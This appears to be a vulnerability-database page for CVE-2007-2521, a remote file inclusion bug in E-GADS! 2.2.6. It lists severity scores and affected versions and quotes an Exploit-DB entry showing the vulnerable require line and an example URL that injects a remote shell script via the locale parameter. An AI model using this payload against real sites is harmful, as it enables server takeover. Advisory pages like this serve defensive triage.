CVE-2007-2521
published 2007-05-08CVE-2007-2521: PHP remote file inclusion vulnerability in common.php in E-GADS! before 2.2.7 allows remote attackers to execute arbitrary PHP code via a URL in the locale…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.34%
87.1th percentile
PHP remote file inclusion vulnerability in common.php in E-GADS! before 2.2.7 allows remote attackers to execute arbitrary PHP code via a URL in the locale parameter.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| e-gads | e-gads | <= 2.2.6 | — |
| e-gads | e-gads | — | — |
| e-gads | e-gads | — | — |
| e-gads | e-gads | — | — |
| e-gads | e-gads | — | — |
| e-gads | e-gads | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion
exploitdb·2015-09-16
CVE-2015-2521 Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion
Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=465
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 1516065514_orig.xls
Crashing File: 1516065514_crash.xls
Minimized Crashing File: 1516065514_min.xls
The minimized crashing file shows a one bit deltas from the original file at offset 0x49E8. OffVis reports this to be the CreateTime field of an OLESSDirectoryEntry structure.
File Versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000
Observed Crash:
When run without Applicati
Exploit-DB
E-GADS! 2.2.6 - 'common.php?locale' Remote File Inclusion
exploitdb·2007-05-04
CVE-2007-2521 E-GADS! 2.2.6 - 'common.php?locale' Remote File Inclusion
E-GADS! 2.2.6 - 'common.php?locale' Remote File Inclusion
---
##############################################################################################
##############################################################################################
#E-GADS! 2.2.6 Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
###################################################################################
#
#ERROR:common.php
#
# require ("$locale/locale.php");
#
#BUG:
#
#Example:http://site.com/path/common.php?locale=[[Sh3LL Script]]
#
#Script Download
#############################################################################
#https://sourceforge.net/project/showfiles.php?group_id=88942&package_id=93125&release_id=444821
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
###
No writeups or analysis indexed.
http://osvdb.org/35773http://secunia.com/advisories/25104http://www.securityfocus.com/bid/23817http://www.vupen.com/english/advisories/2007/1665https://exchange.xforce.ibmcloud.com/vulnerabilities/34073https://sourceforge.net/project/shownotes.php?group_id=88942&release_id=533122https://www.exploit-db.com/exploits/3846http://osvdb.org/35773http://secunia.com/advisories/25104http://www.securityfocus.com/bid/23817http://www.vupen.com/english/advisories/2007/1665https://exchange.xforce.ibmcloud.com/vulnerabilities/34073https://sourceforge.net/project/shownotes.php?group_id=88942&release_id=533122https://www.exploit-db.com/exploits/3846
2007-05-08
Published